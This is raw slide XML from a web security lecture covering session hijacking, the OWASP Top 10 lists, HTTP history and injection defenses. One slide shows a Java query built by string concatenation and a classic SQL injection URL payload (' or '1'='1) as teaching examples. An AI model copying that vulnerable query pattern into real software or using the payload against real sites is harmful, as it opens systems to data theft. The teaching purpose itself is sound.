              <a:t>Integrity</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>No integrity check</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use Crypto Checksum, add session ID to prevent replay attack</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9"/>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Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p49"/>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Authorize user once: an authentication token is send to client by server  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Through browser cookie</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Embedded in URL </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In a hidden form field</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and all subsequent request are tied to user: all subsequent requests are sent with this token</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0"/>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Session Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p50"/>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9" name="Google Shape;259;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1090613"/>
            <a:ext cx="6858000" cy="3571875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1431250" y="4662500"/>
            <a:ext cx="6453900" cy="50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“Stanford CS155 Lecture Notes”</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1"/>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Management Security Issues</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p51"/>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Session hijack: Attacker waits for user to login, then steals user’s session token and “hijacks” session.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Firesheep: a firefox extension that can hijack facebook session tokens over wifi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Always use HTTPS not HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Require unpredictable token</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Always assume cookie data from client is adversarial</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ensure logout invalidates session on server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2"/>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OWASP TOP 10 2017 Web Vulnerabilities </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p52"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A1-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>Injection (e.g. SQL injection)</a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A2-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A3-Sensitive Data Exposure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A4-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML External Entities (XXE)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A5-Broken Access Control </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A6- Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A7-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A8-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insecure Deserialization</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A9-Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A10-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insufficient Logging &amp; Monitoring</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF99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3"/>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OWASP Top 10 2013</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p53"/>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A1 Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A2 Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A3 Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insecure Direct Object References</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A5 Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A6 Sensitive Data Exposure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A7 Missing Function Level Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr u="sng">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A9 Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unvalidated Redirects and Forwards</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF99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4"/>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4"/>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5" name="Google Shape;285;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="799225" y="796075"/>
            <a:ext cx="7310500" cy="3966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5"/>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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p55"/>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Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> String query = "SELECT * FROM accounts WHERE custID=' "  + request.getParameter("id") + " ' "; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://example.com/app/accountView?id=' or '1'='1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9"/>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p29"/>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Hypertext Transfer Protocol - Application Level Protocol (in TCP/IP stack)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Initially by Tim Berners-Lee and his team between 1989-1991</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Versions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP/0.9, HTTP/1.0, HTTP/1.1, HTTP/2 , and HTTP/3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP/1.1 (1999): still in use</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP/2 (2015): began as SPDY(developed mostly at google). Supported by major browsers. Better performance than HTTP/1.1 (binary frames, multiplex the requests over one TCP connection). But it is still over TCP/IP, work with TLS for HTTPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP/3 (2021 draft): began as “HTTP over QUIC” (QUIC: Quick UDP Internet Connections, initially designed by Jim Roskind at Google.) Better performance and encryption by default.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Hypertext (structured text with hyperlinks), Hypermedia, Hyperlink</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>HTML (HyperText Markup Language)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTML5 (the latest version): provides built-in support for hypermedia. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>It subsumes HTML 4, as well as XHTML 1 and DOM Level 2 HTML.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>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6"/>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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p56"/>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Detection: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>static code analysis tool</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Dynamic scanning</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Penetration testing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>e a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Positive or “white list” input validation is also recommended, but is not a complete defense as many applications require special characters in their input.</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7"/>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Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Google Shape;303;p57"/>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Leaks or flaws in authentication and session management can cause exposed accounts, passwords and session IDs to impersonate users.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Example</a:t>
            </a:r>
